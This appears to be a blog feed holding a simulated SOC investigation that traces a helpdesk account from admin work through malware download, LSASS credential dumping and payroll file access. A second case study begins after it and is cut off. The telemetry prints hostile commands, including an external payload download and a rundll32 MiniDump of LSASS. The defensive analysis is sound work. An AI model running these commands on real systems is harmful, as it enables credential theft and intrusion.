/><published>2026-08-08T00:00:00+00:00</published><updated>2026-08-08T00:00:00+00:00</updated><id>/2026/08/08/SOC-Investigation-Case-Study-The-Administrator-and-the-Intruder</id><content type="html" xml:base="/2026/08/08/SOC-Investigation-Case-Study-The-Administrator-and-the-Intruder.html"><![CDATA[<h1 id="soc-investigation-case-study--the-administrator-and-the-intruder">SOC Investigation Case Study — The Administrator and the Intruder</h1>

<h2 id="mixed-telemetry-investigation-distinguishing-legitimate-administration-from-active-compromise">Mixed-Telemetry Investigation: Distinguishing Legitimate Administration from Active Compromise</h2>

<h2 id="overview">Overview</h2>

<p>This investigation was designed to simulate a realistic SOC scenario where legitimate administrative activity transitions into malicious behavior.</p>

<p>The challenge was not simply to identify suspicious commands. The objective was to determine:</p>

<ul>
  <li>Where legitimate administration ended</li>
  <li>When suspicious behavior became evidence of compromise</li>
  <li>How to reconstruct the attack chain</li>
  <li>Which systems became affected</li>
  <li>How multiple Windows telemetry sources could be correlated</li>
  <li>How a SOC analyst should prioritize investigation and escalation</li>
</ul>

<p>The investigation involved activity across:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CLIENT12
    ↓
CLIENT15
    ↓
DC01
    ↓
FILESERVER01
</code></pre></div></div>

<p>The primary telemetry sources included:</p>

<ul>
  <li>Windows Security Events</li>
  <li>Windows PowerShell Script Block Logging</li>
  <li>Sysmon</li>
  <li>Process creation events</li>
  <li>Authentication events</li>
  <li>Kerberos service-ticket events</li>
  <li>File access events</li>
  <li>Network connection telemetry</li>
</ul>

<hr />

<h1 id="1-investigation-telemetry">1. Investigation Telemetry</h1>

<p>Before analyzing the incident, the following telemetry was provided.</p>

<p>This is the complete event sequence used for the investigation.</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:02:11  CLIENT12
4624
Account: HelpDesk01
Logon Type: 2


08:02:19  CLIENT12
4688
powershell.exe
Parent: explorer.exe
Command:
Get-Service


08:02:31  CLIENT12
4104
Get-Process


08:03:04  CLIENT12
4104
Get-ADComputer -Filter *


08:03:16  DC01
4769
Account: HelpDesk01
Service:
ldap/DC01


08:03:24  CLIENT12
4688
powershell.exe
Command:
Enter-PSSession -ComputerName CLIENT15


08:03:31  CLIENT15
4624
Account: HelpDesk01
Logon Type: 3
Source: CLIENT12


08:03:35  CLIENT15
4688
wsmprovhost.exe
Parent: svchost.exe


08:03:42  CLIENT15
4104
Get-Service


08:04:02  CLIENT15
4104
Get-Process


08:04:17  CLIENT15
4688
powershell.exe
Command:
Get-ChildItem C:\Users


08:04:38  CLIENT15
4104
Get-LocalUser


08:05:01  CLIENT15
4688
powershell.exe
Command:
Get-ADGroupMember "Domain Admins"


08:05:17  CLIENT15
Sysmon 3
powershell.exe
→ 185.220.101.44
Port: 443


08:05:23  CLIENT15
4104
Invoke-WebRequest
https://cdn-storage.xyz/update.exe


08:05:29  CLIENT15
Sysmon 11
File Created
C:\ProgramData\update.exe


08:05:41  CLIENT15
4688
update.exe
Parent: powershell.exe


08:05:48  CLIENT15
Sysmon 3
update.exe
→ 185.220.101.44
Port: 443


08:06:12  CLIENT15
4688
rundll32.exe
Command:
comsvcs.dll, MiniDump 612 C:\ProgramData\lsass.dmp full


08:06:18  CLIENT15
Sysmon 11
File Created
C:\ProgramData\lsass.dmp


08:06:29  CLIENT15
4688
powershell.exe
Command:
Remove-Item C:\ProgramData\lsass.dmp


08:06:35  CLIENT15
4104
Remove-Item C:\ProgramData\lsass.dmp


08:07:02  DC01
4769
Account: HelpDesk01
Service:
cifs/FILESERVER01


08:07:15  FILESERVER01
4624
Account: HelpDesk01
Logon Type: 3
Source: CLIENT15


08:07:29  FILESERVER01
4663
Object:
\\FILESERVER01\Finance\Payroll2026.xlsx

Access:
ReadData
</code></pre></div></div>

<hr />

<h1 id="2-investigation-objective">2. Investigation Objective</h1>

<p>The central question was:</p>

<blockquote>
  <p><strong>At what point does apparently legitimate administration become an active compromise?</strong></p>
</blockquote>

<p>The presence of a helpdesk account makes the investigation particularly interesting.</p>

<p>A helpdesk administrator may legitimately:</p>

<ul>
  <li>Log onto workstations</li>
  <li>Use PowerShell</li>
  <li>Query Active Directory</li>
  <li>Enumerate services and processes</li>
  <li>Establish PowerShell Remoting sessions</li>
  <li>Troubleshoot another endpoint</li>
</ul>

<p>Therefore, individual events cannot automatically be classified as malicious.</p>

<p>The investigation must consider the <strong>sequence, context, account, destination, process behavior, network activity and subsequent actions</strong>.</p>

<hr />

<h1 id="3-initial-assessment">3. Initial Assessment</h1>

<p>The activity initially appears consistent with legitimate helpdesk administration.</p>

<p>The sequence begins with:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>HelpDesk01
    ↓
CLIENT12
    ↓
PowerShell
    ↓
Get-Service
    ↓
Get-Process
    ↓
Active Directory discovery
    ↓
PowerShell Remoting
    ↓
CLIENT15
</code></pre></div></div>

<p>At this stage, there is not enough evidence to declare an incident.</p>

<p>A helpdesk technician troubleshooting CLIENT15 could reasonably perform some of these actions.</p>

<hr />

<h1 id="4-where-does-legitimate-activity-end">4. Where Does Legitimate Activity End?</h1>

<p>The last event I would initially consider potentially legitimate is:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:04:02
CLIENT15
4104
Get-Process
</code></pre></div></div>

<p>Both:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Get-Service
Get-Process
</code></pre></div></div>

<p>are common administrative and troubleshooting commands.</p>

<p>Even:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Get-ChildItem C:\Users
Get-LocalUser
</code></pre></div></div>

<p>can have legitimate administrative purposes depending on the troubleshooting task.</p>

<p>However, the investigation becomes increasingly suspicious as the activity progresses.</p>

<hr />

<h1 id="5-first-strong-point-of-suspicion">5. First Strong Point of Suspicion</h1>

<p>The first strong indicator of suspicious activity is:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:05:01
CLIENT15
4688

powershell.exe

Get-ADGroupMember "Domain Admins"
</code></pre></div></div>

<p>This command is not inherently malicious.</p>

<p>However, its <strong>context</strong> is concerning.</p>

<p>The account is:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>HelpDesk01
</code></pre></div></div>

<p>The account has:</p>

<ol>
  <li>Logged onto CLIENT12</li>
  <li>Performed host and process discovery</li>
  <li>Queried Active Directory</li>
  <li>Established a remote PowerShell session to CLIENT15</li>
  <li>Performed additional local enumeration</li>
  <li>Queried membership of the highly privileged Domain Admins group</li>
</ol>

<p>The combination creates a strong behavioral signal.</p>

<h3 id="classification-at-this-point">Classification at this point:</h3>

<p><strong>Suspicious</strong></p>

<p>I would increase monitoring and continue investigation rather than immediately declaring an incident.</p>

<p>The evidence has not yet demonstrated malicious execution or confirmed compromise.</p>

<hr />

<h1 id="6-why-the-context-matters">6. Why the Context Matters</h1>

<p>A SOC analyst should avoid making decisions based on a single command.</p>

<p>For example:</p>

<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Get-ADGroupMember</span><span class="w"> </span><span class="s2">"Domain Admins"</span><span class="w">
</span></code></pre></div></div>

<p>could be legitimate if a helpdesk technician is:</p>

<ul>
  <li>Troubleshooting permissions</li>
  <li>Investigating an access issue</li>
  <li>Supporting an identity-related ticket</li>
  <li>Performing authorized administration</li>
</ul>

<p>However, the same command becomes much more concerning when followed by:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>External network connection
        ↓
PowerShell download
        ↓
Executable creation
        ↓
Executable execution
        ↓
LSASS memory dumping
        ↓
File deletion
        ↓
Sensitive file access
</code></pre></div></div>

<p>This is where behavioral correlation becomes critical.</p>

<hr />

<h1 id="7-escalation-of-suspicion">7. Escalation of Suspicion</h1>

<p>At:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:05:17

CLIENT15

Sysmon Event 3

powershell.exe
→ 185.220.101.44
Port 443
</code></pre></div></div>

<p>the investigation becomes significantly more concerning.</p>

<p>An unexpected outbound HTTPS connection from PowerShell following privileged Active Directory enumeration warrants investigation.</p>

<p>However, I would not rely on the IP address alone to declare malicious activity.</p>

<p>The next events provide much stronger evidence.</p>

<hr />

<h1 id="8-powershell-download-activity">8. PowerShell Download Activity</h1>

<p>At:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:05:23

CLIENT15
4104

Invoke-WebRequest
https://cdn-storage.xyz/update.exe
</code></pre></div></div>

<p>PowerShell is explicitly being used to retrieve an executable from an external location.</p>

<p>This is a major escalation.</p>

<p>The activity is immediately followed by:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:05:29

Sysmon Event 11

File Created

C:\ProgramData\update.exe
</code></pre></div></div>

<p>and then:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:05:41

4688

update.exe
Parent:
powershell.exe
</code></pre></div></div>

<p>This creates a highly suspicious execution chain:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PowerShell
    ↓
Invoke-WebRequest
    ↓
External executable download
    ↓
update.exe created
    ↓
update.exe executed
</code></pre></div></div>

<p>At this point, I would escalate the investigation substantially.</p>

<hr />

<h1 id="9-process-and-network-correlation">9. Process and Network Correlation</h1>

<p>The downloaded executable subsequently communicates with the same external destination:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:05:48

Sysmon Event 3

update.exe
→ 185.220.101.44
Port 443
</code></pre></div></div>

<p>This provides stronger evidence that the downloaded executable is actively communicating externally.</p>

<p>The sequence can now be represented as:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CLIENT15
    │
    ├── powershell.exe
    │       │
    │       ├── Invoke-WebRequest
    │       │
    │       └── Downloads update.exe
    │
    └── update.exe
            │
            └── HTTPS → 185.220.101.44
</code></pre></div></div>

<p>This is no longer simply an administrative investigation.</p>

<p>The behavior is consistent with malicious execution and possible command-and-control or external staging activity.</p>

<hr />

<h1 id="10-confirmed-credential-access">10. Confirmed Credential Access</h1>

<p>The strongest evidence of compromise appears at:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:06:12

CLIENT15
4688

rundll32.exe

comsvcs.dll, MiniDump 612
C:\ProgramData\lsass.dmp full
</code></pre></div></div>

<p>The command is attempting to dump LSASS memory.</p>

<p>LSASS contains authentication-related material, making LSASS memory dumping a high-value credential-access technique.</p>

<p>The activity is followed by:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:06:18

Sysmon Event 11

File Created

C:\ProgramData\lsass.dmp
</code></pre></div></div>

<p>This confirms that the memory dump file was created.</p>

<p>At this point, the classification should be:</p>

<h1 id="incident">INCIDENT</h1>

<p>The investigation now contains multiple independent indicators of compromise:</p>

<ul>
  <li>Suspicious Active Directory enumeration</li>
  <li>External PowerShell communication</li>
  <li>Download of an executable</li>
  <li>Execution of the downloaded executable</li>
  <li>External communication from the executable</li>
  <li>LSASS memory dumping</li>
  <li>Evidence removal</li>
</ul>

<p>This is sufficient to treat the activity as an active security incident.</p>

<hr />

<h1 id="11-evidence-removal">11. Evidence Removal</h1>

<p>The attacker subsequently executes:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:06:29

4688

powershell.exe

Remove-Item C:\ProgramData\lsass.dmp
</code></pre></div></div>

<p>PowerShell logging confirms:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:06:35

4104

Remove-Item C:\ProgramData\lsass.dmp
</code></pre></div></div>

<p>This indicates an attempt to remove evidence of credential-access activity.</p>

<p>The deletion itself does not erase the fact that the activity occurred because the organization may still have:</p>

<ul>
  <li>Windows event logs</li>
  <li>Sysmon telemetry</li>
  <li>SIEM copies</li>
  <li>EDR telemetry</li>
  <li>File-system artifacts</li>
  <li>Network logs</li>
  <li>Authentication records</li>
</ul>

<p>This reinforces the importance of centralized logging.</p>

<hr />

<h1 id="12-access-to-fileserver01">12. Access to FILESERVER01</h1>

<p>The attacker then requests a Kerberos service ticket:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:07:02

DC01
4769

Account:
HelpDesk01

Service:
cifs/FILESERVER01
</code></pre></div></div>

<p>This is followed by:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:07:15

FILESERVER01
4624

Account:
HelpDesk01

Logon Type:
3

Source:
CLIENT15
</code></pre></div></div>

<p>The source has now changed:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CLIENT12
    ↓
CLIENT15
    ↓
FILESERVER01
</code></pre></div></div>

<p>The account is being used to authenticate to another system after the compromise of CLIENT15.</p>

<hr />

<h1 id="13-sensitive-file-access">13. Sensitive File Access</h1>

<p>The final event shows:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:07:29

FILESERVER01
4663

Object:
\\FILESERVER01\Finance\Payroll2026.xlsx

Access:
ReadData
</code></pre></div></div>

<p>The investigation therefore ends with access to a potentially sensitive financial/payroll document.</p>

<p>This expands the potential impact beyond endpoint compromise.</p>

<hr />

<h1 id="14-reconstructed-attack-chain">14. Reconstructed Attack Chain</h1>

<p>The complete investigation can now be reconstructed as:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>HelpDesk01
     │
     ▼
CLIENT12
     │
     ├── Interactive logon
     ├── PowerShell
     ├── Get-Service
     ├── Get-Process
     └── AD discovery
             │
             ▼
     Enter-PSSession CLIENT15
             │
             ▼
        CLIENT15
             │
             ├── Local discovery
             ├── Domain Admin enumeration
             │
             ├── PowerShell
             │      ↓
             │  Invoke-WebRequest
             │      ↓
             │  update.exe
             │
             ├── update.exe execution
             │      ↓
             │  External HTTPS communication
             │
             ├── LSASS memory dump
             │      ↓
             │  lsass.dmp
             │
             ├── Delete lsass.dmp
             │
             ▼
        FILESERVER01
             │
             └── Payroll2026.xlsx
                 ReadData
</code></pre></div></div>

<hr />

<h1 id="15-mitre-attck-mapping">15. MITRE ATT&amp;CK Mapping</h1>

<p>The observed activity maps to several MITRE ATT&amp;CK techniques.</p>

<table>
  <thead>
    <tr>
      <th>Activity</th>
      <th>ATT&amp;CK Technique</th>
      <th>Description</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">Get-ADComputer -Filter *</code></td>
      <td>T1018 / T1069-related discovery</td>
      <td>System and account/domain discovery</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">Get-ADGroupMember "Domain Admins"</code></td>
      <td>T1069.002</td>
      <td>Permission Groups Discovery: Domain Groups</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">Enter-PSSession</code></td>
      <td>T1021.006</td>
      <td>Windows Remote Management</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">Invoke-WebRequest</code></td>
      <td>T1105</td>
      <td>Ingress Tool Transfer</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">update.exe</code> execution</td>
      <td>T1204 / execution behavior</td>
      <td>Execution of transferred payload</td>
    </tr>
    <tr>
      <td>External HTTPS communication</td>
      <td>T1071.001</td>
      <td>Web Protocols</td>
    </tr>
    <tr>
      <td>LSASS memory dump</td>
      <td>T1003.001</td>
      <td>OS Credential Dumping: LSASS Memory</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">Remove-Item lsass.dmp</code></td>
      <td>T1070</td>
      <td>Indicator Removal</td>
    </tr>
    <tr>
      <td>Access to payroll file</td>
      <td>Collection</td>
      <td>Collection of sensitive information</td>
    </tr>
  </tbody>
</table>

<p>The exact ATT&amp;CK mapping should be validated against the organization’s detection framework and the precise behavior observed.</p>

<hr />

<h1 id="16-first-splunk-investigation">16. First Splunk Investigation</h1>

<p>My initial investigation would establish the broader activity surrounding CLIENT12 before narrowing into individual events.</p>

<p>For example:</p>

<pre><code class="language-spl">index=wineventlog host=CLIENT12 earliest=-2h latest=+2h
| table _time EventCode Account_Name Logon_ID LogonGuid ProcessGuid ParentImage Image Process_Command_Line
| sort _time
</code></pre>

<p>The objective is to determine:</p>

<ul>
  <li>What happened before the first visible event?</li>
  <li>Was CLIENT12 already compromised?</li>
  <li>Was HelpDesk01 legitimately using the workstation?</li>
  <li>Were there earlier suspicious processes?</li>
  <li>Did another account interact with the machine?</li>
</ul>

<hr />

<h1 id="17-investigation-pivots">17. Investigation Pivots</h1>

<p>I would perform the pivots in approximately this order.</p>

<h3 id="pivot-1--account">Pivot 1 — Account</h3>

<p>Start with:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>HelpDesk01
</code></pre></div></div>

<p>Determine:</p>

<ul>
  <li>Where else did the account authenticate?</li>
  <li>Was it active on other endpoints?</li>
  <li>Were there unusual logon locations?</li>
  <li>Did the account suddenly become active outside normal patterns?</li>
</ul>

<hr />

<h3 id="pivot-2--logonguid">Pivot 2 — LogonGUID</h3>

<p>Use the relevant authentication context to follow activity associated with the session.</p>

<p>This helps connect authentication events with subsequent activity associated with the same logon context.</p>

<hr />

<h3 id="pivot-3--processguid">Pivot 3 — ProcessGUID</h3>

<p>Use ProcessGUID where available to reconstruct process lineage.</p>

<p>For example:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>powershell.exe
      ↓
update.exe
      ↓
network connection
</code></pre></div></div>

<p>This helps establish whether processes belong to the same execution chain.</p>

<hr />

<h3 id="pivot-4--source-and-destination-hosts">Pivot 4 — Source and Destination Hosts</h3>

<p>Track:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CLIENT12 → CLIENT15 → FILESERVER01
</code></pre></div></div>

<p>This is critical because the investigation crosses multiple systems.</p>

<hr />

<h1 id="18-additional-telemetry-required">18. Additional Telemetry Required</h1>

<p>I would collect additional telemetry from:</p>

<h3 id="client12">CLIENT12</h3>

<p>To determine whether initial compromise occurred before the visible timeline.</p>

<p>Look for:</p>

<ul>
  <li>Process creation</li>
  <li>PowerShell activity</li>
  <li>Authentication events</li>
  <li>Persistence mechanisms</li>
  <li>Network connections</li>
  <li>File creation</li>
</ul>

<h3 id="client15">CLIENT15</h3>

<p>This is the primary compromised endpoint.</p>

<p>I would collect:</p>

<ul>
  <li>Sysmon Event ID 1</li>
  <li>Sysmon Event ID 3</li>
  <li>Sysmon Event ID 11</li>
  <li>PowerShell 4104</li>
  <li>Security 4688</li>
  <li>Authentication events</li>
  <li>Persistence mechanisms</li>
  <li>EDR alerts</li>
  <li>DNS activity</li>
</ul>

<h3 id="dc01">DC01</h3>

<p>I would investigate:</p>

<ul>
  <li>4768</li>
  <li>4769</li>
  <li>4624</li>
  <li>4625</li>
  <li>Directory-service activity</li>
  <li>Authentication anomalies</li>
</ul>

<p>The objective is to determine whether the compromised credentials were used elsewhere.</p>

<h3 id="fileserver01">FILESERVER01</h3>

<p>I would investigate:</p>

<ul>
  <li>4624</li>
  <li>4663</li>
  <li>Additional file access events</li>
  <li>SMB activity</li>
  <li>Other files accessed by HelpDesk01</li>
  <li>Subsequent file modifications or transfers</li>
</ul>

<hr />

<h1 id="19-scope-assessment">19. Scope Assessment</h1>

<h3 id="client12-1">CLIENT12</h3>

<p><strong>In scope for investigation.</strong></p>

<p>CLIENT12 is the initial workstation in the visible sequence and may have been the source of the remote session.</p>

<p>However, the provided telemetry does <strong>not independently prove that CLIENT12 was infected</strong>.</p>

<p>Further investigation is required.</p>

<h3 id="client15-1">CLIENT15</h3>

<p><strong>Confirmed affected.</strong></p>

<p>Evidence includes:</p>

<ul>
  <li>Suspicious PowerShell activity</li>
  <li>External executable download</li>
  <li>Executable execution</li>
  <li>External network communication</li>
  <li>LSASS memory dumping</li>
  <li>Evidence removal</li>
</ul>

<p>CLIENT15 should be treated as the primary compromised endpoint.</p>

<h3 id="fileserver01-1">FILESERVER01</h3>

<p><strong>Affected / potentially impacted.</strong></p>

<p>The compromised activity resulted in:</p>

<ul>
  <li>Authentication to FILESERVER01</li>
  <li>Access to a payroll document</li>
</ul>

<p>The scope of additional file access must be investigated.</p>

<h3 id="dc01-1">DC01</h3>

<p><strong>Involved in authentication.</strong></p>

<p>The provided telemetry shows DC01 issuing Kerberos service tickets.</p>

<p>This does not by itself demonstrate compromise of DC01, but authentication activity involving the compromised account should be investigated.</p>

<hr />

<h1 id="20-incident-severity">20. Incident Severity</h1>

<p>Based on the available evidence, I would treat this as a <strong>high-severity security incident</strong>.</p>

<p>The combination of:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Active Directory reconnaissance
        +
Remote PowerShell
        +
External payload download
        +
Payload execution
        +
External communication
        +
LSASS credential dumping
        +
Evidence removal
        +
Sensitive file access
</code></pre></div></div>

<p>indicates a progression from reconnaissance to execution, credential access, defense evasion and collection.</p>

<p>The potential exposure of payroll information further increases the business impact.</p>

<hr />

<h1 id="21-immediate-soc-response">21. Immediate SOC Response</h1>

<p>The first priority would be containment.</p>

<h3 id="1-isolate-client15">1. Isolate CLIENT15</h3>

<p>CLIENT15 is the confirmed compromised endpoint.</p>

<h3 id="2-investigate-and-potentially-isolate-client12">2. Investigate and potentially isolate CLIENT12</h3>

<p>CLIENT12 should be investigated for initial access or credential compromise before assuming it is clean.</p>

<h3 id="3-disable-or-restrict-helpdesk01">3. Disable or restrict HelpDesk01</h3>

<p>The account should be investigated and, where appropriate, disabled or have its active sessions and credentials revoked.</p>

<h3 id="4-protect-fileserver01">4. Protect FILESERVER01</h3>

<p>Review and restrict the compromised account’s access while determining the extent of file access.</p>

<h3 id="5-preserve-evidence">5. Preserve evidence</h3>

<p>Do not rely solely on deleting or cleaning the endpoint.</p>

<p>Preserve:</p>

<ul>
  <li>SIEM telemetry</li>
  <li>EDR telemetry</li>
  <li>Memory where appropriate</li>
  <li>Disk artifacts</li>
  <li>Network logs</li>
  <li>Authentication logs</li>
</ul>

<h3 id="6-investigate-credential-exposure">6. Investigate credential exposure</h3>

<p>Because LSASS was dumped, credentials associated with the affected system should be considered potentially compromised.</p>

<hr />

<h1 id="22-key-soc-lessons">22. Key SOC Lessons</h1>

<p>This investigation demonstrates why SOC analysts should avoid relying on isolated alerts.</p>

<p>At the beginning of the timeline:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PowerShell
Get-Service
Get-Process
Enter-PSSession
</code></pre></div></div>

<p>could all have legitimate administrative explanations.</p>

<p>The investigation changed when the behavior became chained:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>AD reconnaissance
       ↓
Domain Admin enumeration
       ↓
External PowerShell communication
       ↓
Executable download
       ↓
Payload execution
       ↓
LSASS dumping
       ↓
Evidence removal
       ↓
Sensitive file access
</code></pre></div></div>

<p>The <strong>sequence</strong> provided much stronger evidence than any single event.</p>

<hr />

<h1 id="23-key-takeaways">23. Key Takeaways</h1>

<p>This exercise reinforced several SOC investigation principles:</p>

<h3 id="context-matters">Context matters</h3>

<p>A helpdesk account performing PowerShell activity is not automatically malicious.</p>

<h3 id="sequence-matters">Sequence matters</h3>

<p>Multiple individually explainable events can become highly suspicious when chained together.</p>

<h3 id="correlation-matters">Correlation matters</h3>

<p>Account, host, process, authentication and network telemetry should be investigated together.</p>

<h3 id="process-lineage-matters">Process lineage matters</h3>

<p>ProcessGUID and parent-child relationships can help reconstruct execution.</p>

<h3 id="credential-dumping-changes-the-incident">Credential dumping changes the incident</h3>

<p>An LSASS memory dump is a major escalation point because credentials may be exposed.</p>

<h3 id="evidence-removal-does-not-erase-telemetry">Evidence removal does not erase telemetry</h3>

<p>Centralized SIEM logging can preserve evidence even when an attacker deletes local files.</p>

<h3 id="scope-must-be-evidence-based">Scope must be evidence-based</h3>

<p>A machine can be in scope for investigation without being definitively classified as compromised.</p>

<hr />

<h1 id="conclusion">Conclusion</h1>

<p>This mixed-telemetry investigation simulated a realistic SOC scenario in which legitimate administrative behavior gradually transitioned into an active compromise.</p>

<p>The most important lesson was not simply recognizing malicious commands. It was learning to determine <strong>when the behavioral context changed</strong>.</p>

<p>The investigation progressed from:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Potentially legitimate administration
              ↓
Suspicious reconnaissance
              ↓
Malware staging
              ↓
Malicious execution
              ↓
Credential access
              ↓
Defense evasion
              ↓
Sensitive data access
</code></pre></div></div>

<p>By correlating Windows authentication, PowerShell, Sysmon, process creation, network and file-access telemetry, the investigation could be reconstructed as a coherent attack chain rather than a collection of isolated alerts.</p>

<p>This exercise represents the type of analytical workflow I am continuing to develop as I progress toward SOC analyst responsibilities.</p>

<hr />

<h2 id="skills-practiced">Skills Practiced</h2>

<ul>
  <li>Splunk SIEM investigation</li>
  <li>Windows event analysis</li>
  <li>PowerShell telemetry analysis</li>
  <li>Sysmon analysis</li>
  <li>Process-tree reconstruction</li>
  <li>Authentication analysis</li>
  <li>Kerberos telemetry analysis</li>
  <li>Threat hunting</li>
  <li>Attack-chain reconstruction</li>
  <li>Incident classification</li>
  <li>Scope assessment</li>
  <li>MITRE ATT&amp;CK mapping</li>
  <li>SOC escalation and containment reasoning</li>
</ul>

<hr />

<p><strong>Author:</strong> Precious Anyanwu
<strong>Focus:</strong> SOC Analysis | Incident Response | Splunk | Cloud Security</p>]]></content><author><name>Precious Cyber6ixxx</name></author><summary type="html"><![CDATA[SOC Investigation Case Study — The Administrator and the Intruder]]></summary></entry><entry><title type="html">Soc Investigation Case Study Helpdesk</title><link href="/2026/08/06/soc-investigation-case-study-helpdesk.html" rel="alternate" type="text/html" title="Soc Investigation Case Study Helpdesk" /><published>2026-08-06T00:00:00+00:00</published><updated>2026-08-06T00:00:00+00:00</updated><id>/2026/08/06/soc-investigation-case-study-helpdesk</id><content type="html" xml:base="/2026/08/06/soc-investigation-case-study-helpdesk.html"><![CDATA[<h1 id="soc-investigation-case-study-the-helpdesk-account">SOC Investigation Case Study: The HelpDesk Account</h1>

<h2 id="investigating-suspicious-active-directory-enumeration-and-remote-powershell-administration">Investigating Suspicious Active Directory Enumeration and Remote PowerShell Administration</h2>

<hr />

<h2 id="overview">Overview</h2>

<p>This case study documents a simulated SOC investigation involving a legitimate-looking helpdesk account, <strong>HelpDesk01</strong>, performing Active Directory enumeration followed by remote PowerShell administration of another workstation.</p>

<p>The investigation was designed to answer an important SOC question:</p>

<blockquote>
  <p><strong>When does legitimate administrative activity become suspicious enough to investigate as potential attacker behaviour?</strong></p>
</blockquote>

<p>Rather than treating individual events as malicious in isolation, the investigation focused on correlating authentication, process creation, PowerShell, Kerberos, WinRM and network telemetry to determine whether the activity represented legitimate helpdesk administration or potential account compromise.</p>

<hr />

<h1 id="investigation-scenario">Investigation Scenario</h1>

<p>The investigation began with activity observed on <strong>CLIENT14</strong>.</p>

<h3 id="initial-event-sequence">Initial Event Sequence</h3>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>09:14:02  CLIENT14
4624
Account: HelpDesk01
Logon Type: 2
</code></pre></div></div>

<p>HelpDesk01 successfully authenticated interactively to CLIENT14.</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>09:14:09  CLIENT14
4688

explorer.exe
    └── mmc.exe
</code></pre></div></div>

<p>A Microsoft Management Console process was launched.</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>09:14:15  CLIENT14
4688

mmc.exe
    └── powershell.exe
</code></pre></div></div>

<p>PowerShell was then launched from MMC.</p>

<p>The investigation subsequently identified PowerShell Script Block Logging activity:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>09:14:21  CLIENT14
4104

Get-ADComputer -Filter *
</code></pre></div></div>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>09:14:29  CLIENT14
4104

Get-ADUser -Filter *
</code></pre></div></div>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>09:14:41  CLIENT14
4104

Get-ADGroupMember "Domain Admins"
</code></pre></div></div>

<p>The activity then progressed to the Domain Controller:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>09:15:02  DC01
4769

Account: HelpDesk01
Service: ldap/DC01
</code></pre></div></div>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>09:15:08  DC01
4769

Account: HelpDesk01
Service: cifs/CLIENT14
</code></pre></div></div>

<p>Additional local enumeration was observed:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>09:15:14  CLIENT14
4688

cmd.exe

net localgroup administrators
</code></pre></div></div>

<p>followed by:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>09:15:32  CLIENT14
4688

powershell.exe

Get-Service
</code></pre></div></div>

<p>Network telemetry then showed:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>09:16:01  CLIENT14
Sysmon Event ID 3

powershell.exe
    ↓
10.0.0.10:5985
</code></pre></div></div>

<p>Port <strong>5985</strong> is commonly associated with Windows Remote Management (WinRM).</p>

<p>Shortly afterwards:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>09:16:07  CLIENT14
4688

powershell.exe

Enter-PSSession -ComputerName CLIENT15
</code></pre></div></div>

<p>The remote session resulted in:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>09:16:19  CLIENT15
4624

Account: HelpDesk01
Logon Type: 3
Source: CLIENT14
</code></pre></div></div>

<p>The remote PowerShell session then generated:</p>

